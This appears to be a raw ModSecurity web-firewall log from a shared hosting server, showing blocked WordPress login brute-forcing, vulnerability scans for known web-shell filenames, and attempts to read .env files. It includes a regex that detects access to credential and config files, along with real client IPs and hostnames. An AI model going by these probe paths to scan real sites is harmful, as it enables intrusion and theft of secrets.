[Tue May 26 17:28:28.928877 2026] [security2:error] [pid 891273:tid 891345] [remote 92.117.185.70:61005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWK5MDEzZ8z3jtDm82PRQAACUc"]
[Tue May 26 17:28:29.739603 2026] [security2:error] [pid 891273:tid 891464] [client 20.12.194.227:35153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWK5cDEzZ8z3jtDm82PfwAAAD0"]
[Tue May 26 17:28:29.739736 2026] [security2:error] [pid 891273:tid 891464] [client 20.12.194.227:35153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWK5cDEzZ8z3jtDm82PfwAAAD0"]
[Tue May 26 17:28:29.926782 2026] [security2:error] [pid 891273:tid 891462] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK5cDEzZ8z3jtDm82PbgAAADs"]
[Tue May 26 17:28:29.955861 2026] [security2:error] [pid 891273:tid 891437] [client 203.194.101.7:62610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK5cDEzZ8z3jtDm82PjwAAACI"]
[Tue May 26 17:28:29.955966 2026] [security2:error] [pid 891273:tid 891437] [client 203.194.101.7:62610] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK5cDEzZ8z3jtDm82PjwAAACI"]
[Tue May 26 17:28:31.495211 2026] [security2:error] [pid 891273:tid 891491] [client 20.12.194.227:50200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWK58DEzZ8z3jtDm82P3wAAAFg"]
[Tue May 26 17:28:31.495344 2026] [security2:error] [pid 891273:tid 891491] [client 20.12.194.227:50200] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWK58DEzZ8z3jtDm82P3wAAAFg"]
[Tue May 26 17:28:32.425265 2026] [security2:error] [pid 891273:tid 891446] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK58DEzZ8z3jtDm82P-wAAACs"]
[Tue May 26 17:28:32.623445 2026] [security2:error] [pid 891273:tid 891459] [client 20.12.194.227:26022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWK6MDEzZ8z3jtDm82QIQAAADg"]
[Tue May 26 17:28:32.623543 2026] [security2:error] [pid 891273:tid 891459] [client 20.12.194.227:26022] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWK6MDEzZ8z3jtDm82QIQAAADg"]
[Tue May 26 17:28:33.351600 2026] [security2:error] [pid 891273:tid 891419] [client 20.12.194.227:50216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWK6cDEzZ8z3jtDm82QSwAAABA"]
[Tue May 26 17:28:33.351714 2026] [security2:error] [pid 891273:tid 891419] [client 20.12.194.227:50216] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWK6cDEzZ8z3jtDm82QSwAAABA"]
[Tue May 26 17:28:33.845539 2026] [security2:error] [pid 891273:tid 891405] [client 142.132.180.39:11638] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWK6cDEzZ8z3jtDm82QSgAAAAI"], referer: https://thegoodsporting.com
[Tue May 26 17:28:34.293802 2026] [security2:error] [pid 891273:tid 891482] [client 20.12.194.227:37761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QgAAAAE8"]
[Tue May 26 17:28:34.293910 2026] [security2:error] [pid 891273:tid 891482] [client 20.12.194.227:37761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QgAAAAE8"]
[Tue May 26 17:28:34.506519 2026] [security2:error] [pid 891273:tid 891517] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QcgAAAHI"]
[Tue May 26 17:28:34.632665 2026] [security2:error] [pid 891273:tid 891300] [remote 103.91.67.202:33654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QhgAASRo"]
[Tue May 26 17:28:34.809140 2026] [security2:error] [pid 891273:tid 891510] [client 20.12.194.227:25993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QjwAAAGs"]
[Tue May 26 17:28:34.809219 2026] [security2:error] [pid 891273:tid 891510] [client 20.12.194.227:25993] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QjwAAAGs"]
[Tue May 26 17:28:35.624772 2026] [security2:error] [pid 891273:tid 891523] [client 20.12.194.227:37800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWK68DEzZ8z3jtDm82QogAAAHg"]
[Tue May 26 17:28:35.624907 2026] [security2:error] [pid 891273:tid 891523] [client 20.12.194.227:37800] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWK68DEzZ8z3jtDm82QogAAAHg"]
[Tue May 26 17:28:36.253852 2026] [security2:error] [pid 891273:tid 891516] [client 64.233.173.131:36923] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWK6sDEzZ8z3jtDm82QhwAAAHE"]
[Tue May 26 17:28:36.305056 2026] [security2:error] [pid 891273:tid 891508] [client 20.12.194.227:58279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWK7MDEzZ8z3jtDm82QvAAAAGk"]
[Tue May 26 17:28:36.305180 2026] [security2:error] [pid 891273:tid 891508] [client 20.12.194.227:58279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWK7MDEzZ8z3jtDm82QvAAAAGk"]
[Tue May 26 17:28:36.405151 2026] [security2:error] [pid 891273:tid 891462] [client 113.163.104.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK68DEzZ8z3jtDm82QrgAAADs"]
[Tue May 26 17:28:36.461616 2026] [security2:error] [pid 891273:tid 891484] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK7MDEzZ8z3jtDm82QsQAAAFE"]
[Tue May 26 17:28:36.918865 2026] [security2:error] [pid 891273:tid 891524] [client 43.173.177.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWK7MDEzZ8z3jtDm82Q0QAAAHk"]
[Tue May 26 17:28:36.972156 2026] [security2:error] [pid 891273:tid 891485] [client 208.84.100.152:41494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shop.taotechservices.com"] [uri "/app/.env"] [unique_id "ahWK7MDEzZ8z3jtDm82Q2AAAAFI"]
[Tue May 26 17:28:36.973739 2026] [security2:error] [pid 891273:tid 891435] [client 208.84.100.152:41502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shop.taotechservices.com"] [uri "/api/.env"] [unique_id "ahWK7MDEzZ8z3jtDm82Q2gAAACA"]
[Tue May 26 17:28:36.975228 2026] [security2:error] [pid 891273:tid 891483] [client 208.84.100.152:41460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shop.taotechservices.com"] [uri "/.env"] [unique_id "ahWK7MDEzZ8z3jtDm82Q5gAAAFA"]
[Tue May 26 17:28:36.981855 2026] [security2:error] [pid 891273:tid 891436] [client 208.84.100.152:41510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shop.taotechservices.com"] [uri "/backend/.env"] [unique_id "ahWK7MDEzZ8z3jtDm82Q3wAAACE"]
[Tue May 26 17:28:38.449157 2026] [security2:error] [pid 891273:tid 891403] [client 20.12.194.227:25999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWK7sDEzZ8z3jtDm82RHQAAAAA"]
[Tue May 26 17:28:38.449275 2026] [security2:error] [pid 891273:tid 891403] [client 20.12.194.227:25999] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWK7sDEzZ8z3jtDm82RHQAAAAA"]
[Tue May 26 17:28:39.401851 2026] [security2:error] [pid 891273:tid 891432] [client 20.12.194.227:26008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWK78DEzZ8z3jtDm82ROQAAAB0"]
[Tue May 26 17:28:39.401986 2026] [security2:error] [pid 891273:tid 891432] [client 20.12.194.227:26008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWK78DEzZ8z3jtDm82ROQAAAB0"]
[Tue May 26 17:28:39.424774 2026] [security2:error] [pid 891273:tid 891444] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK7sDEzZ8z3jtDm82RLwAAACk"]
[Tue May 26 17:28:39.728242 2026] [security2:error] [pid 891273:tid 891410] [client 223.235.98.214:27443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWK78DEzZ8z3jtDm82RPQAAAAc"]
[Tue May 26 17:28:39.728396 2026] [security2:error] [pid 891273:tid 891410] [client 223.235.98.214:27443] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWK78DEzZ8z3jtDm82RPQAAAAc"]
[Tue May 26 17:28:40.191825 2026] [security2:error] [pid 891273:tid 891435] [client 20.12.194.227:63000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWK8MDEzZ8z3jtDm82RSgAAACA"]
[Tue May 26 17:28:40.191999 2026] [security2:error] [pid 891273:tid 891435] [client 20.12.194.227:63000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWK8MDEzZ8z3jtDm82RSgAAACA"]
[Tue May 26 17:28:40.352863 2026] [security2:error] [pid 891273:tid 891511] [client 203.194.101.7:62918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK8MDEzZ8z3jtDm82RSwAAAGw"]
[Tue May 26 17:28:40.352998 2026] [security2:error] [pid 891273:tid 891511] [client 203.194.101.7:62918] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWK8MDEzZ8z3jtDm82RSwAAAGw"]
[Tue May 26 17:28:41.058049 2026] [security2:error] [pid 891273:tid 891520] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK8MDEzZ8z3jtDm82RWQAAAHU"]
[Tue May 26 17:28:41.078639 2026] [security2:error] [pid 891273:tid 891314] [remote 5.42.158.148:51018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWK8MDEzZ8z3jtDm82RXQAAcCg"]
[Tue May 26 17:28:41.979856 2026] [security2:error] [pid 891273:tid 891529] [client 20.12.194.227:58248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWK8cDEzZ8z3jtDm82RcAAAAH4"]
[Tue May 26 17:28:41.979972 2026] [security2:error] [pid 891273:tid 891529] [client 20.12.194.227:58248] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWK8cDEzZ8z3jtDm82RcAAAAH4"]
[Tue May 26 17:28:42.412239 2026] [security2:error] [pid 891273:tid 891416] [client 20.12.194.227:50182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWK8sDEzZ8z3jtDm82RfgAAAA0"]
[Tue May 26 17:28:42.412340 2026] [security2:error] [pid 891273:tid 891416] [client 20.12.194.227:50182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWK8sDEzZ8z3jtDm82RfgAAAA0"]
[Tue May 26 17:28:43.077566 2026] [security2:error] [pid 891273:tid 891327] [remote 167.71.130.119:49350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWK8sDEzZ8z3jtDm82RiAAAPjU"]
[Tue May 26 17:28:43.326735 2026] [security2:error] [pid 891273:tid 891513] [client 20.12.194.227:37818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWK88DEzZ8z3jtDm82RkgAAAG4"]
[Tue May 26 17:28:43.326834 2026] [security2:error] [pid 891273:tid 891513] [client 20.12.194.227:37818] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWK88DEzZ8z3jtDm82RkgAAAG4"]
[Tue May 26 17:28:43.486852 2026] [security2:error] [pid 891273:tid 891476] [client 87.106.152.203:64512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.onesoft.in"] [uri "/images/images/cache.php"] [unique_id "ahWK88DEzZ8z3jtDm82RnQAAAEk"], referer: www.google.com
[Tue May 26 17:28:43.626643 2026] [security2:error] [pid 891273:tid 891342] [remote 209.42.20.53:37198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWK88DEzZ8z3jtDm82RnAAAakQ"]
[Tue May 26 17:28:43.778221 2026] [security2:error] [pid 891273:tid 891449] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK88DEzZ8z3jtDm82RlQAAAC4"]
[Tue May 26 17:28:44.908640 2026] [security2:error] [pid 891273:tid 891417] [client 20.12.194.227:26047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWK9MDEzZ8z3jtDm82RuAAAAA4"]
[Tue May 26 17:28:44.908768 2026] [security2:error] [pid 891273:tid 891417] [client 20.12.194.227:26047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWK9MDEzZ8z3jtDm82RuAAAAA4"]
[Tue May 26 17:28:46.239282 2026] [security2:error] [pid 891273:tid 891403] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWK9cDEzZ8z3jtDm82R1wAAAAA"]
[Tue May 26 17:28:46.363479 2026] [security2:error] [pid 891273:tid 891516] [client 20.12.194.227:35195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWK9sDEzZ8z3jtDm82R5AAAAHE"]
[Tue May 26 17:28:46.363572 2026] [security2:error] [pid 891273:tid 891516] [client 20.12.194.227:35195] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.rokartech.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWK9sDEzZ8z3jtDm82R5AAAAHE"]
